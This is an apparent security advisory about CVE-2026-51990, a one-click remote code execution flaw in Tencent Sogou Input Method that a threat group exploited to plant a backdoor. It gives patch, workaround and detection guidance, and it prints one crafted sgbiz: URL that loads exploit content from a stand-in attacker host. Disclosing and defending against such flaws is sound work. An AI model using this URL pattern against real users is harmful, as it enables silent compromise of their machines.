
CVE-2026-51990: Tencent Sogou Input Method — One-Click RCE Backdoor Risk (June 2026)
CVE-2026-51990 — Tencent Sogou Input Method
CVE-2026-51990 is a critical remote code execution vulnerability in Tencent’s Sogou Input Method, a widely deployed Chinese language input editor. The flaw, rated critical, was actively exploited by the UNC3569 threat group to deliver the GRAYRABBIT backdoor before Tencent issued a patch.
Attack Vector
Attackers exploited a chain of three vulnerabilities involving Sogou’s custom protocol handler and embedded browser. By sending users a crafted sgbiz: URL—such as sgbiz://sgmyinput.exe?page=skincenter&url=https://attacker.com/exploit.html—UNC3569 achieved code execution after a single click. The exploit required no further user interaction, enabling silent installation of the GRAYRABBIT backdoor. The attack leveraged the protocol handler’s ability to pass arbitrary parameters to the application, which then loaded attacker-controlled web content in the embedded browser.
Who Is at Risk
All users of Tencent Sogou Input Method prior to the patched release are vulnerable. The product is installed on hundreds of millions of endpoints, primarily in the Asia-Pacific region. Tencent was directly affected, and any organization with Sogou Input Method deployed is at risk of compromise, including potential for large-scale espionage or lateral movement.
Patch & Mitigate
- Patch: Update Sogou Input Method to the latest version released by Tencent as of June 2026. Apply immediately; the vulnerability is under active exploitation.
- Workaround: Disable or unregister the sgbiz: protocol handler if patching is not immediately possible.
- Detect: Monitor for process launches of
sgmyinput.exewith suspicious-pageand-urlparameters, and review web traffic for connections to known malicious domains such as attacker.com or anomalous sgbiz: URL invocations.
MITRE ATT&CK
- TA0001 — Initial Access: Attackers used malicious links to gain execution on target systems.
- TA0005 — Defense Evasion: The backdoor was installed silently with minimal user interaction, evading standard detection.
Source: https://www.gendigital.com/blog/insights/research/one-click-backdoor-sogou
Start Your 14-Day Free Trial
Get curated cyber intelligence delivered to your inbox every morning at 6 AM. No credit card required.
Get Started Free

